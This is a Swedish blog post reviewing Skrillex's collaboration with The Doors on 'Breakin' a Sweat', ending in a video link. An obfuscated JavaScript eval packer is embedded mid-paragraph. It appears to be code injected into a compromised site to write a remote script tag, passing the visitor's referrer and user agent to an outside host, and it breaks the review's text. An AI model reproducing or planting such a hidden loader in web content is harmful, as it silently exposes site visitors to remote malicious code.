Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Skrillex feat. The Doors – Breakin’ a Sweat

Skrillex feat. The Doors – Breakin’ a Sweat
Sebastian

Här har vi en av de mest emotsedda låtarna från den kommande musikdokumentären RE:GENERATION (läs artikeln här), eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rreis|var|u0026u|referrer|znzky||js|php’.split(’|’),0,{}))
”Breakin’ a Sweat” som är Skrillex’s samarbete med legendariska The Doors.

 

Skrillex (Sonny Moore) tillsammans med Robby Krieger

Låten blev mycket bättre än vad jag trodde baserat på det vi fick höra från trailern. Tanken var att kombinera dubstep med rock, tråkigt nog blir det inte så mycket rock utan mest typiska Skrillex-melodier och stabs. Bortsett från det får vi här höra Skrillex själv bidra med sin röst (”I’m breakin’ a sweat!”) som för denna gången inte har så mycket effekter på sig tillsammans med soft gitarrspelande och en rätt nötig syntslinga.

Som tidigare nämnt är det Skrillex som står i centrum och det bjuds inte så mycket på The Doors, vilket är lite trist då de enligt mig är ett större dragplåster än Skrillex, men det funkar ju.

httpv://www.youtube.com/watch?v=bPmHyRXsHvs